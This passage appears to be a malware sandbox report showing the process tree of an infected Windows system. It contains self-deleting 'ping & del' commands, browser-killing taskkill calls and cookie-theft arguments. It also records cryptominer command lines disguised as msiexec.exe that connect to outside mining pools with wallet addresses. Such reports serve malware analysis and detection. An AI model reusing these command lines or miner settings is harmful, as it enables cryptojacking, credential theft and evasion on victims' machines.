C:\Users\Admin\AppData\Roaming\1616802299571.exe"C:\Users\Admin\AppData\Roaming\1616802299571.exe" /sjson "C:\Users\Admin\AppData\Roaming\1616802299571.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:552
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:416
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"6⤵PID:900
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:2216
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exeC:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:3620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe"6⤵PID:3280
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:1540
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:4624
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
PID:4412
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1572 -
C:\Users\Admin\AppData\Roaming\CAD7.tmp.exe"C:\Users\Admin\AppData\Roaming\CAD7.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:3292 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:2228
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:4416
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:616
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:972
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
PID:1080
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
PID:4616 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:2976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4556 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1704
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 947A1E6AB7C31FFB31FBE7E9E4B26C7C C2⤵
- Loads dropped DLL
PID:4644
-